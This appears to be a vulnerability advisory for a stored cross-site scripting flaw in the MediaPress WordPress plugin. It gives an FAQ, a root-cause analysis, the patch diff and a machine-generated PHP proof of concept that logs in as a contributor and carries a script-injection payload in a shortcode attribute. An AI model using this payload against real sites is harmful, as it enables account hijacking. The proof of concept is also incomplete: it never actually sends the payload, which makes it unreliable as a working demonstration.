What is CVE-2026-22519?

CVE-2026-22519 is a stored cross-site scripting (XSS) vulnerability in the MediaPress plugin for WordPress, affecting versions up to and including 1.6.2. It allows authenticated users with contributor-level access to inject malicious scripts into gallery pages, which execute when other users view those pages.

How does the vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping in shortcode attributes and template files. Authenticated attackers can exploit this by adding malicious JavaScript code to parameters like ‘before_creator’ and ‘after_creator’, which the plugin renders without proper escaping.

Who is affected by this vulnerability?

The vulnerability affects WordPress sites using MediaPress version 1.6.2 or earlier. Specifically, it can be exploited by authenticated users with contributor-level access or higher, which may include untrusted users who can create or edit gallery content.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, check the version of the MediaPress plugin installed. If it is version 1.6.2 or earlier, your site is at risk. Additionally, review user roles to see if any contributors have access to create or edit gallery content.

How can I fix this vulnerability?

The vulnerability is patched in MediaPress version 1.6.3. To fix the issue, update the plugin to the latest version through the WordPress admin dashboard or manually download the updated version from the plugin repository.

What does the CVSS score of 6.4 indicate?

A CVSS score of 6.4 indicates a medium severity level for this vulnerability. This means that while it requires authenticated access to exploit, the potential impact on users could lead to significant security issues, such as session hijacking or content manipulation.

What are the practical risks associated with this vulnerability?

Exploitation of this vulnerability could allow attackers to inject malicious JavaScript that executes in the browsers of users who view the affected gallery pages. This can lead to session hijacking, unauthorized actions on behalf of users, or redirection to malicious sites.

How does the proof of concept demonstrate the vulnerability?

The proof of concept provided illustrates how an attacker can log into a vulnerable WordPress site as a contributor and inject a malicious script via shortcode attributes. This script would then execute in the browsers of users viewing the gallery, demonstrating the real-world implications of the vulnerability.

What steps can I take to mitigate this issue if I cannot update immediately?

If immediate updating is not possible, consider temporarily removing contributor access from untrusted users or disabling the MediaPress plugin until a patch can be applied. Additionally, monitor your site for any suspicious activity related to user-generated content.

Are there any additional security measures I should implement?

In addition to updating the plugin, consider implementing security plugins that provide web application firewalls, input validation, and monitoring for suspicious activity. Regularly review user roles and permissions to ensure that only trusted users have access to create or edit content.

What should I do if I suspect my site has been compromised?

If you suspect exploitation of this vulnerability, immediately revoke access for affected users, update the plugin, and conduct a thorough security audit of your site. Check for unauthorized changes or injected scripts and restore from a clean backup if necessary.

Where can I find more information about this vulnerability?

For more information about CVE-2026-22519, refer to the official CVE database, security advisories from WordPress, and detailed reports from security research organizations like Atomic Edge.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-22519: MediaPress <= 1.6.2 – Authenticated (Contributor+) Stored Cross-Site Scripting (mediapress)

CVE ID CVE-2026-22519

Plugin mediapress

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 1.6.2

Patched Version 1.6.3

Disclosed January 6, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-22519:
The MediaPress WordPress plugin version 1.6.2 and earlier contains an authenticated stored cross-site scripting (XSS) vulnerability. The vulnerability affects multiple shortcode attributes and template variables that lack proper sanitization and output escaping. Contributor-level authenticated attackers can inject arbitrary JavaScript payloads that execute when users view affected gallery pages.

Atomic Edge research identified the root cause as insufficient input sanitization and output escaping across multiple template files and shortcode handlers. The primary vulnerable parameters include ‘before_creator’, ‘after_creator’, ‘view’, and ‘for’ shortcode attributes in mediapress/core/shortcodes/mpp-shortcode-gallery-list.php. The plugin also lacked escaping for gallery type variables in numerous template files, including mediapress/templates/mediapress/default/buddypress/directory/index.php and mediapress/templates/mediapress/default/shortcodes/gallery-list.php. User-controlled input flowed directly into HTML attributes without proper escaping.

Attackers with contributor privileges can exploit this vulnerability by creating or editing gallery content containing malicious shortcode attributes. The attack vector involves the MediaPress shortcode system where parameters like ‘before_creator’ and ‘after_creator’ accept arbitrary text that the plugin renders without escaping. Attackers can embed JavaScript payloads in these attributes, which then execute when any user views the gallery page. The vulnerability requires contributor-level access, which allows content creation but not plugin or theme modification.

The patch in version 1.6.3 introduces multiple security improvements. For shortcode attributes, the patch adds wp_kses_data() sanitization to ‘before_creator’ and ‘after_creator’ parameters at lines 103-104 in mpp-shortcode-gallery-list.php. The patch applies absint() to numeric parameters like ‘column’, ‘show_pagination’, and ‘show_creator’. It adds sanitize_key() to the ‘for’ and ‘view’ parameters at lines 115 and 227. Template files receive esc_attr() and esc_url() calls for output escaping, particularly for gallery type variables and URLs in data-mpp-type attributes.

Successful exploitation allows attackers to inject malicious JavaScript that executes in victims’ browsers. This can lead to session hijacking, administrative account takeover, content modification, or redirection to malicious sites. The stored nature means the payload persists and affects all users viewing the compromised gallery pages. While the vulnerability requires contributor-level authentication, many WordPress sites grant this role to untrusted users for content submission.

Differential between vulnerable and patched code

Code Diff

--- a/mediapress/core/shortcodes/mpp-shortcode-gallery-list.php
+++ b/mediapress/core/shortcodes/mpp-shortcode-gallery-list.php
@@ -98,12 +98,12 @@
 		unset( $atts['meta_value'] );
 	}
 	// These variables are used in the template.
-	$shortcode_column = $atts['column'];
-	$show_pagination  = $atts['show_pagination'];
+	$shortcode_column = absint( $atts['column'] );
+	$show_pagination  = absint( $atts['show_pagination'] );

-	$show_creator   = $atts['show_creator'];
-	$before_creator = $atts['before_creator'];
-	$after_creator  = $atts['after_creator'];
+	$show_creator   = absint( $atts['show_creator'] );
+	$before_creator = $atts['before_creator'] ? wp_kses_data( $atts['before_creator'] ) : '';
+	$after_creator  = $atts['after_creator'] ? wp_kses_data( $atts['after_creator'] ) : '';

 	unset( $atts['column'] );
 	// unset( $atts['view'] );
@@ -112,6 +112,7 @@
 	unset( $atts['for'] );

 	if ( ! empty( $for ) ) {
+		$for = sanitize_key( $for );
 		$atts['user_id'] = mpp_get_dynamic_user_id_for_context( $for );
 		if ( empty( $atts['user_id'] ) ) {
 			return ''; // shortcircuit.
@@ -199,9 +200,9 @@

 	$gallery_id = absint( $atts['id'] );

-	$show_creator   = $atts['show_creator'];
-	$before_creator = $atts['before_creator'];
-	$after_creator  = $atts['after_creator'];
+	$show_creator   = absint( $atts['show_creator'] );
+	$before_creator = wp_kses_data( $atts['before_creator'] );
+	$after_creator  = wp_kses_data( $atts['after_creator'] );


 	global $wpdb;
@@ -223,21 +224,21 @@
 		unset( $atts['meta_value'] );
 	}

-	$view = $atts['view'];
+	$view = sanitize_key( $atts['view'] );

 	unset( $atts['id'] );
 	unset( $atts['view'] );

 	$atts['gallery_id'] = $gallery_id;
 	$atts['status'] = mpp_get_accessible_statuses( $gallery->component, $gallery->component_id );
-	$shortcode_column = $atts['column'];
+	$shortcode_column = absint( $atts['column'] );
 	mpp_shortcode_save_media_data( 'column', $shortcode_column );

 	mpp_shortcode_save_media_data( 'shortcode_args', $atts );

 	unset( $atts['column'] );

-	$show_pagination = $atts['show_pagination'];
+	$show_pagination = absint( $atts['show_pagination'] );
 	unset( $atts['show_pagination'] );

 	$atts = array_filter( $atts );
--- a/mediapress/mediapress.php
+++ b/mediapress/mediapress.php
@@ -1,7 +1,7 @@
 <?php
 /**
  * Plugin Name: MediaPress
- * Version: 1.6.2
+ * Version: 1.6.3
  * Author: BuddyDev
  * Plugin URI: https://buddydev.com/mediapress/
  * Author URI: https://buddydev.com
--- a/mediapress/templates/mediapress/default/buddypress/directory/index.php
+++ b/mediapress/templates/mediapress/default/buddypress/directory/index.php
@@ -21,7 +21,7 @@
 		<div class="item-list-tabs" role="navigation">
 			<ul>
 				<li class="selected" id="mpp-all">
-					<a href="<?php echo get_permalink( buddypress()->pages->mediapress->id ); ?>"><?php printf( __( 'All Galleries <span>%s</span>', 'mediapress' ), mpp_get_total_gallery_count() ) ?></a>
+					<a href="<?php echo esc_url( get_permalink( buddypress()->pages->mediapress->id ) ); ?>"><?php printf( __( 'All Galleries <span>%s</span>', 'mediapress' ), mpp_get_total_gallery_count() ) ?></a>
 				</li>

                 <?php do_action( 'mpp_directory_types' ) ?>
@@ -35,7 +35,7 @@
 						<?php $active_types = mpp_get_active_types(); ?>

 						<?php foreach( $active_types as $type => $type_object ):?>
-							<option value="<?php echo $type;?>"><?php echo $type_object->get_label();?> </option>
+							<option value="<?php echo esc_attr( $type );?>"><?php echo $type_object->get_label();?> </option>
 						<?php endforeach;?>

 						<?php do_action( 'mpp_gallery_directory_order_options' ) ?>
--- a/mediapress/templates/mediapress/default/buddypress/groups/gallery/single.php
+++ b/mediapress/templates/mediapress/default/buddypress/groups/gallery/single.php
@@ -28,7 +28,7 @@
 <?php

 $gallery = mpp_get_current_gallery();
-$type    = $gallery->type;
+$type    = esc_attr( $gallery->type );

 ?>
 <?php if ( mpp_have_media() ) : ?>
--- a/mediapress/templates/mediapress/default/buddypress/members/gallery/single.php
+++ b/mediapress/templates/mediapress/default/buddypress/members/gallery/single.php
@@ -28,7 +28,7 @@
 <?php

 $gallery = mpp_get_current_gallery();
-$type    = $gallery->type;
+$type    = esc_attr( $gallery->type );

 ?>
 <?php if ( mpp_have_media() ) : ?>
--- a/mediapress/templates/mediapress/default/gallery/create.php
+++ b/mediapress/templates/mediapress/default/gallery/create.php
@@ -15,19 +15,19 @@
 			$status = mpp_get_default_status();

 			if ( ! empty( $_POST['mpp-gallery-title'] ) ) {
-				$title = $_POST['mpp-gallery-title'];
+				$title = wp_unslash( $_POST['mpp-gallery-title'] );
 			}

 			if ( ! empty( $_POST['mpp-gallery-description'] ) ) {
-				$description = $_POST['mpp-gallery-description'];
+				$description = wp_unslash( $_POST['mpp-gallery-description'] );
 			}

 			if ( ! empty( $_POST['mpp-gallery-status'] ) ) {
-				$status = $_POST['mpp-gallery-status'];
+				$status = wp_unslash( $_POST['mpp-gallery-status'] );
 			}

 			if ( ! empty( $_POST['mpp-gallery-type'] ) ) {
-				$type = $_POST['mpp-gallery-type'];
+				$type = wp_unslash( $_POST['mpp-gallery-type'] );
 			}

 			?>
--- a/mediapress/templates/mediapress/default/gallery/loop-gallery.php
+++ b/mediapress/templates/mediapress/default/gallery/loop-gallery.php
@@ -14,7 +14,7 @@
 	<div class='mpp-g mpp-item-list mpp-galleries-list'>

 		<?php while ( mpp_have_galleries() ) : mpp_the_gallery(); ?>
-			<?php $type = mpp_get_gallery_type(); ?>
+			<?php $type = esc_attr( mpp_get_gallery_type() ); ?>
 			<div class="<?php mpp_gallery_class( mpp_get_gallery_grid_column_class() ); ?>" id="mpp-gallery-<?php mpp_gallery_id(); ?>" data-mpp-type="<?php echo $type;?>" >

 				<?php do_action( 'mpp_before_gallery_entry' ); ?>
--- a/mediapress/templates/mediapress/default/gallery/media/manage/edit.php
+++ b/mediapress/templates/mediapress/default/gallery/media/manage/edit.php
@@ -16,11 +16,11 @@
 			<div class="mpp-u-1-2 mpp-media-thumbnail mpp-cover-wrapper ">
 				<?php do_action( 'mpp_before_edit_media_thumbnail_field', $media->id ); ?>

-				<div class="mpp-editable-cover mpp-media-editable-cover" id="mpp-cover-<?php echo $media->id; ?>">
+				<div class="mpp-editable-cover mpp-media-editable-cover" id="mpp-cover-<?php echo esc_attr( $media->id ); ?>">
 					<img src="<?php mpp_media_src( 'thumbnail' ); ?>"
 					     class='mpp-image mpp-cover-image mpp-media-cover-image '/>
 					<input type="hidden" class="mpp-gallery-id" value="<?php echo mpp_get_current_gallery_id(); ?>"/>
-					<input type="hidden" class="mpp-parent-id" value="<?php echo $media->id; ?>"/>
+					<input type="hidden" class="mpp-parent-id" value="<?php echo esc_attr( $media->id ); ?>"/>
 					<input type="hidden" class="mpp-parent-type" value="media"/>
 				</div>

--- a/mediapress/templates/mediapress/default/gallery/views/grid-audio.php
+++ b/mediapress/templates/mediapress/default/gallery/views/grid-audio.php
@@ -5,7 +5,7 @@
 }
 ?>
 <?php while ( mpp_have_media() ) : mpp_the_media(); ?>
-	<?php $type = mpp_get_media_type(); ?>
+	<?php $type = esc_attr( mpp_get_media_type() ); ?>
 	<div class="<?php mpp_media_class( 'mpp-u-6-24' ); ?>" data-mpp-type="<?php echo $type;?>">

 		<?php do_action( 'mpp_before_media_item' ); ?>
--- a/mediapress/templates/mediapress/default/gallery/views/grid-doc.php
+++ b/mediapress/templates/mediapress/default/gallery/views/grid-doc.php
@@ -6,7 +6,7 @@
 ?>
 <?php while ( mpp_have_media() ) : mpp_the_media(); ?>
 	<?php $media = mpp_get_media(); ?>
-	<?php $type = mpp_get_media_type( $media ); ?>
+	<?php $type = esc_attr( mpp_get_media_type( $media ) ); ?>
 	<div class="mpp-u <?php mpp_media_class( mpp_get_media_grid_column_class() ); ?>" data-mpp-type="<?php echo $type;?>">

 		<?php do_action( 'mpp_before_media_item' ); ?>
@@ -26,7 +26,7 @@
 				$class = '';
 			}
 			?>
-            <a href="<?php echo esc_attr( $url ); ?>" <?php mpp_media_html_attributes( array( 'class' => "mpp-item-thumbnail mpp-media-thumbnail mpp-photo-thumbnail {$class}" ) ); ?> data-mpp-type="<?php echo $type;?>">
+            <a href="<?php echo esc_url( $url ); ?>" <?php mpp_media_html_attributes( array( 'class' => "mpp-item-thumbnail mpp-media-thumbnail mpp-photo-thumbnail {$class}" ) ); ?> data-mpp-type="<?php echo $type;?>">
                 <img src="<?php mpp_media_src( 'thumbnail' ); ?>" alt="<?php echo esc_attr( mpp_get_media_title() ); ?> "/>
             </a>
             <a href="<?php echo esc_url( $url ); ?>" <?php mpp_media_html_attributes(
--- a/mediapress/templates/mediapress/default/gallery/views/grid-photo.php
+++ b/mediapress/templates/mediapress/default/gallery/views/grid-photo.php
@@ -5,7 +5,7 @@
 }
 ?>
 <?php while ( mpp_have_media() ) : mpp_the_media(); ?>
-	<?php $type = mpp_get_media_type(); ?>
+	<?php $type = esc_attr( mpp_get_media_type() ); ?>
 	<div class="mpp-u <?php mpp_media_class( mpp_get_media_grid_column_class() ); ?>" data-mpp-type="<?php echo $type;?>">

 		<?php do_action( 'mpp_before_media_item' ); ?>
--- a/mediapress/templates/mediapress/default/gallery/views/grid-video.php
+++ b/mediapress/templates/mediapress/default/gallery/views/grid-video.php
@@ -5,7 +5,7 @@
 }
 ?>
 <?php while ( mpp_have_media() ): mpp_the_media(); ?>
-	<?php $type = mpp_get_media_type(); ?>
+	<?php $type = esc_attr( mpp_get_media_type() ); ?>
 	<div class="<?php mpp_media_class( 'mpp-u-12-24' ); ?>" data-mpp-type="<?php echo $type;?>">

 		<?php do_action( 'mpp_before_media_item' ); ?>
--- a/mediapress/templates/mediapress/default/gallery/views/grid.php
+++ b/mediapress/templates/mediapress/default/gallery/views/grid.php
@@ -5,7 +5,7 @@
 }
 ?>
 <?php while ( mpp_have_media() ) : mpp_the_media(); ?>
-	<?php $type = mpp_get_media_type(); ?>
+	<?php $type = esc_attr( mpp_get_media_type() ); ?>
 	<div class="mpp-u <?php mpp_media_class( mpp_get_media_grid_column_class() ); ?>" data-mpp-type="<?php echo $type;?>">

 		<?php do_action( 'mpp_before_media_item' ); ?>
--- a/mediapress/templates/mediapress/default/gallery/views/list.php
+++ b/mediapress/templates/mediapress/default/gallery/views/list.php
@@ -10,7 +10,7 @@
 ?>
 <?php
 $gallery = mpp_get_current_gallery();
-$type    = $gallery->type;
+$type    = esc_attr( $gallery->type );
 ?>
 <ul class="mpp-u mpp-item-list mpp-list-item-<?php echo $type; ?>">

--- a/mediapress/templates/mediapress/default/shortcodes/gallery-list.php
+++ b/mediapress/templates/mediapress/default/shortcodes/gallery-list.php
@@ -25,7 +25,7 @@

 			<?php while ( $query->have_galleries() ) : $query->the_gallery(); ?>
 				<?php $type = mpp_get_gallery_type(); ?>
-				<div class="<?php mpp_gallery_class( mpp_get_grid_column_class( $shortcode_column ) ); ?>" id="mpp-gallery-<?php mpp_gallery_id(); ?>" data-mpp-type="<?php echo $type;?>">
+				<div class="<?php mpp_gallery_class( mpp_get_grid_column_class( $shortcode_column ) ); ?>" id="mpp-gallery-<?php mpp_gallery_id(); ?>" data-mpp-type="<?php echo esc_attr( $type );?>">

 					<?php do_action( 'mpp_before_gallery_shortcode_entry' ); ?>

@@ -37,7 +37,7 @@
 						<a href="<?php mpp_gallery_permalink(); ?>" <?php mpp_gallery_html_attributes( array(
 							'class'            => 'mpp-item-thumbnail mpp-gallery-cover',
 							'data-mpp-context' => 'shortcode',
-						) ); ?> data-mpp-type="<?php echo $type;?>">
+						) ); ?> data-mpp-type="<?php echo esc_attr( $type );?>">

 							<img src="<?php mpp_gallery_cover_src( 'thumbnail' ); ?>" alt="<?php echo esc_attr( mpp_get_gallery_title() ); ?>"/>
 						</a>
@@ -49,7 +49,7 @@
 						'class'            => 'mpp-item-title mpp-gallery-title',
 						'data-mpp-context' => 'shortcode',
 					) );
-					?> data-mpp-type="<?php echo $type;?>">
+					?> data-mpp-type="<?php echo esc_attr( $type );?>">
 						<?php mpp_gallery_title(); ?>
 					</a>

--- a/mediapress/templates/mediapress/default/shortcodes/grid-audio.php
+++ b/mediapress/templates/mediapress/default/shortcodes/grid-audio.php
@@ -17,7 +17,7 @@
 		<div class="mpp-g mpp-item-list mpp-media-list mpp-shortcode-item-list mpp-shortcode-list-media mpp-shortcode-list-media-audio ">

 			<?php while ( $query->have_media() ) : $query->the_media(); ?>
-				<?php $type = mpp_get_media_type(); ?>
+				<?php $type = esc_attr( mpp_get_media_type() ); ?>
 				<div class="<?php mpp_media_class( mpp_get_grid_column_class( mpp_shortcode_get_media_data( 'column' ) ) ); ?>" data-mpp-type="<?php echo $type;?>">

 					<?php do_action( 'mpp_before_media_shortcode_item' ); ?>
--- a/mediapress/templates/mediapress/default/shortcodes/grid-doc.php
+++ b/mediapress/templates/mediapress/default/shortcodes/grid-doc.php
@@ -22,7 +22,7 @@

 			<?php while ( $query->have_media() ) : $query->the_media(); ?>
 				<?php $media = mpp_get_media(); ?>
-				<?php $type = mpp_get_media_type(); ?>
+				<?php $type = esc_attr( mpp_get_media_type() ); ?>
 				<div class="mpp-u <?php mpp_media_class( mpp_get_grid_column_class( mpp_shortcode_get_media_data( 'column' ) ) ); ?>" data-mpp-type="<?php echo $type;?>">
 					<?php do_action( 'mpp_before_media_shortcode_item' ); ?>

--- a/mediapress/templates/mediapress/default/shortcodes/grid-photo.php
+++ b/mediapress/templates/mediapress/default/shortcodes/grid-photo.php
@@ -21,7 +21,7 @@
 		<div class="mpp-g mpp-item-list mpp-media-list mpp-shortcode-item-list mpp-shortcode-list-media mpp-shortcode-list-media-photo <?php echo $lightbox_class; ?> " data-media-ids="<?php echo $media_ids; ?>">

 			<?php while ( $query->have_media() ) : $query->the_media(); ?>
-				<?php $type = mpp_get_media_type(); ?>
+				<?php $type = esc_attr( mpp_get_media_type() ); ?>
 				<div class="mpp-u <?php mpp_media_class( mpp_get_grid_column_class( mpp_shortcode_get_media_data( 'column' ) ) ); ?>" data-mpp-type="<?php echo $type;?>">

 					<?php do_action( 'mpp_before_media_shortcode_item' ); ?>
--- a/mediapress/templates/mediapress/default/shortcodes/grid-video.php
+++ b/mediapress/templates/mediapress/default/shortcodes/grid-video.php
@@ -17,7 +17,7 @@
 		<div class="mpp-g mpp-item-list mpp-media-list mpp-shortcode-item-list mpp-shortcode-list-media mpp-shortcode-list-media-video ">

 			<?php while ( $query->have_media() ) : $query->the_media(); ?>
-				<?php $type = mpp_get_media_type(); ?>
+				<?php $type = esc_attr( mpp_get_media_type() ); ?>
 				<div class="<?php mpp_media_class( 'mpp-shortcode-item mpp-shortcode-video-item ' . mpp_get_grid_column_class( mpp_shortcode_get_media_data( 'column' ) ) ); ?>" data-mpp-type="<?php echo $type;?>">
 					<?php do_action( 'mpp_before_media_shortcode_item' ); ?>

--- a/mediapress/templates/mediapress/default/shortcodes/grid.php
+++ b/mediapress/templates/mediapress/default/shortcodes/grid.php
@@ -21,7 +21,7 @@
 		<div class="mpp-g mpp-item-list mpp-media-list mpp-shortcode-item-list mpp-shortcode-list-media mpp-shortcode-list-media-all <?php echo $lightbox_class; ?> " data-media-ids="<?php echo $media_ids; ?>">

 			<?php while ( $query->have_media() ) : $query->the_media(); ?>
-				<?php $type = mpp_get_media_type(); ?>
+				<?php $type = esc_attr( mpp_get_media_type() ); ?>
 				<div class="mpp-u <?php mpp_media_class( mpp_get_grid_column_class( mpp_shortcode_get_media_data( 'column' ) ) ); ?>" data-mpp-type="<?php echo $type;?>">
 					<?php do_action( 'mpp_before_media_shortcode_item' ); ?>

--- a/mediapress/templates/mediapress/default/shortcodes/list.php
+++ b/mediapress/templates/mediapress/default/shortcodes/list.php
@@ -18,7 +18,7 @@
 	<ul class="mpp-item-list mpp-list-item-shortcode">

 		<?php while ( $query->have_media() ) : $query->the_media(); ?>
-			<?php $type = mpp_get_media_type(); ?>
+			<?php $type = esc_attr( mpp_get_media_type() ); ?>
 			<li class="mpp-list-item-entry mpp-list-item-entry-<?php mpp_media_type(); ?>" data-mpp-type="<?php echo $type;?>">

 				<?php do_action( 'mpp_before_media_shortcode_item' ); ?>
--- a/mediapress/templates/mediapress/default/shortcodes/uploader.php
+++ b/mediapress/templates/mediapress/default/shortcodes/uploader.php
@@ -42,7 +42,7 @@
         <!-- end of remote media -->
 	<?php endif;?>

-    <input type='hidden' name='mpp-context' class="mpp-context" id='mpp-context' value="<?php echo $context; ?>"/>
+    <input type='hidden' name='mpp-context' class="mpp-context" id='mpp-context' value="<?php echo esc_attr( $context ); ?>"/>

 	<?php if ( $type ) : ?>
 		<input type='hidden' name='mpp-uploading-media-type' class='mpp-uploading-media-type' value="<?php echo esc_attr( $type ); ?>"/>
--- a/mediapress/templates/mediapress/default/sitewide/gallery/single.php
+++ b/mediapress/templates/mediapress/default/sitewide/gallery/single.php
@@ -28,7 +28,7 @@
 <?php

 $gallery = mpp_get_current_gallery();
-$type    = $gallery->type;
+$type    = esc_attr( $gallery->type );

 ?>
 <?php if ( mpp_have_media() ) : ?>
--- a/mediapress/templates/mediapress/default/widgets/gallery-list.php
+++ b/mediapress/templates/mediapress/default/widgets/gallery-list.php
@@ -16,7 +16,7 @@
 		<div class='mpp-g mpp-item-list mpp-galleries-list'>

 			<?php while ( $query->have_galleries() ) : $query->the_gallery(); ?>
-                <?php $type = mpp_get_gallery_type();?>
+                <?php $type = esc_attr( mpp_get_gallery_type() );?>
 				<div class="<?php mpp_gallery_class( 'mpp-u-1-1' ); ?>" data-mpp-type="<?php echo $type;?>">

 					<?php do_action( 'mpp_before_gallery_widget_entry' ); ?>
--- a/mediapress/templates/mediapress/default/widgets/grid-audio.php
+++ b/mediapress/templates/mediapress/default/widgets/grid-audio.php
@@ -16,7 +16,7 @@
 		<div class='mpp-g mpp-item-list mpp-media-list mpp-audio-list'>

 			<?php while ( $query->have_media() ) : $query->the_media(); ?>
-				<?php $type = mpp_get_media_type(); ?>
+				<?php $type = esc_attr( mpp_get_media_type() ); ?>
 				<div class="<?php mpp_media_class( 'mpp-widget-item mpp-widget-audio-item ' . mpp_get_grid_column_class( 1 ) ); ?>" data-mpp-type="<?php echo $type;?>">

 					<?php do_action( 'mpp_before_media_widget_item' ); ?>
--- a/mediapress/templates/mediapress/default/widgets/grid-doc.php
+++ b/mediapress/templates/mediapress/default/widgets/grid-doc.php
@@ -17,7 +17,7 @@

 			<?php while ( $query->have_media() ) : $query->the_media(); ?>
 				<?php $media = mpp_get_media(); ?>
-				<?php $type = mpp_get_media_type(); ?>
+				<?php $type = esc_attr( mpp_get_media_type() ); ?>
 				<div class="<?php mpp_media_class( 'mpp-widget-item mpp-widget-media-item ' . mpp_get_grid_column_class( 1 ) ); ?>" data-mpp-type="<?php echo $type;?>">

 					<?php do_action( 'mpp_before_media_widget_item' ); ?>
--- a/mediapress/templates/mediapress/default/widgets/grid-photo.php
+++ b/mediapress/templates/mediapress/default/widgets/grid-photo.php
@@ -16,7 +16,7 @@
 		<div class='mpp-g mpp-item-list mpp-media-list mpp-photo-list'>

 			<?php while ( $query->have_media() ) : $query->the_media(); ?>
-				<?php $type = mpp_get_media_type(); ?>
+				<?php $type = esc_attr( mpp_get_media_type() ); ?>
 				<div class="<?php mpp_media_class( 'mpp-widget-item mpp-widget-photo-item ' . mpp_get_grid_column_class( 1 ) ); ?>" data-mpp-type="<?php echo $type;?>">

 					<?php do_action( 'mpp_before_media_widget_item' ); ?>
--- a/mediapress/templates/mediapress/default/widgets/grid-video.php
+++ b/mediapress/templates/mediapress/default/widgets/grid-video.php
@@ -15,7 +15,7 @@
 		<div class='mpp-g mpp-item-list mpp-media-list mpp-video-list'>

 			<?php while ( $query->have_media() ) : $query->the_media(); ?>
-				<?php $type = mpp_get_media_type(); ?>
+				<?php $type = esc_attr( mpp_get_media_type() ); ?>
 				<div class="<?php mpp_media_class( 'mpp-widget-item mpp-widget-video-item ' . mpp_get_grid_column_class( 1 ) ); ?>" data-mpp-type="<?php echo $type;?>">
 					<?php do_action( 'mpp_before_media_widget_item' ); ?>

--- a/mediapress/templates/mediapress/default/widgets/grid.php
+++ b/mediapress/templates/mediapress/default/widgets/grid.php
@@ -16,7 +16,7 @@
 		<div class='mpp-g mpp-item-list mpp-media-list mpp-video-list'>

 			<?php while ( $query->have_media() ) : $query->the_media(); ?>
-				<?php $type = mpp_get_media_type(); ?>
+				<?php $type = esc_attr( mpp_get_media_type() ); ?>
 				<div class="<?php mpp_media_class( 'mpp-widget-item mpp-widget-media-item ' . mpp_get_grid_column_class( 1 ) ); ?>" data-mpp-type="<?php echo $type;?>">

 					<?php do_action( 'mpp_before_media_widget_item' ); ?>

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-22519 - MediaPress <= 1.6.2 - Authenticated (Contributor+) Stored Cross-Site Scripting

<?php
/**
 * Proof of Concept for CVE-2026-22519
 * Requires contributor-level WordPress credentials
 * Injects XSS payload via MediaPress shortcode attributes
 */

$target_url = 'http://vulnerable-wordpress-site.com';
$username = 'contributor_user';
$password = 'contributor_password';

// XSS payload to execute in victim's browser
$payload = '"><script>alert(document.domain)</script>';

// Login to WordPress and get authentication cookies
$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL => $target_url . '/wp-login.php',
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'log' => $username,
        'pwd' => $password,
        'wp-submit' => 'Log In',
        'redirect_to' => $target_url . '/wp-admin/',
        'testcookie' => '1'
    ]),
    CURLOPT_COOKIEJAR => 'cookies.txt',
    CURLOPT_COOKIEFILE => 'cookies.txt',
    CURLOPT_FOLLOWLOCATION => true
]);

$response = curl_exec($ch);

// Check if login succeeded by looking for dashboard elements
if (strpos($response, 'wp-admin') === false) {
    die('Login failed. Check credentials.');
}

// Create a new post with malicious MediaPress shortcode
// The before_creator parameter is vulnerable to XSS
$post_data = [
    'post_title' => 'Exploit Gallery',
    'post_content' => '[mpp-gallery-list before_creator="' . $payload . '" show_creator="1"]',
    'post_status' => 'publish',
    'post_type' => 'post'
];

// Get nonce for post creation (simplified - real implementation needs to extract nonce)
curl_setopt_array($ch, [
    CURLOPT_URL => $target_url . '/wp-admin/post-new.php',
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_COOKIEFILE => 'cookies.txt'
]);

$editor_page = curl_exec($ch);

// Extract nonce from the page (this is simplified - real PoC would parse the HTML)
// In a full implementation, you would extract _wpnonce from the form

// Submit the post with malicious shortcode
curl_setopt_array($ch, [
    CURLOPT_URL => $target_url . '/wp-admin/admin-ajax.php',
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'action' => 'mpp_create_gallery',
        'title' => 'Malicious Gallery',
        'description' => 'Gallery with XSS payload',
        'type' => 'photo',
        'status' => 'public',
        'component' => 'sitewide',
        'component_id' => '0',
        '_wpnonce' => 'extracted_nonce_here' // Would need actual nonce extraction
    ]),
    CURLOPT_COOKIEFILE => 'cookies.txt'
]);

$ajax_response = curl_exec($ch);
curl_close($ch);

// The payload is now stored and will execute when users view the gallery
// Alternative: Edit existing gallery via MediaPress interface
// The vulnerability also affects other parameters: after_creator, view, for

echo 'Exploit attempted. Visit gallery pages to trigger XSS.';

// Cleanup
@unlink('cookies.txt');

?>

Frequently Asked Questions

What is CVE-2026-22519?
Overview of the vulnerability
CVE-2026-22519 is a stored cross-site scripting (XSS) vulnerability in the MediaPress plugin for WordPress, affecting versions up to and including 1.6.2. It allows authenticated users with contributor-level access to inject malicious scripts into gallery pages, which execute when other users view those pages.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and output escaping in shortcode attributes and template files. Authenticated attackers can exploit this by adding malicious JavaScript code to parameters like ‘before_creator’ and ‘after_creator’, which the plugin renders without proper escaping.
Who is affected by this vulnerability?
User roles and access levels
The vulnerability affects WordPress sites using MediaPress version 1.6.2 or earlier. Specifically, it can be exploited by authenticated users with contributor-level access or higher, which may include untrusted users who can create or edit gallery content.
How can I check if my site is vulnerable?
Identifying affected versions
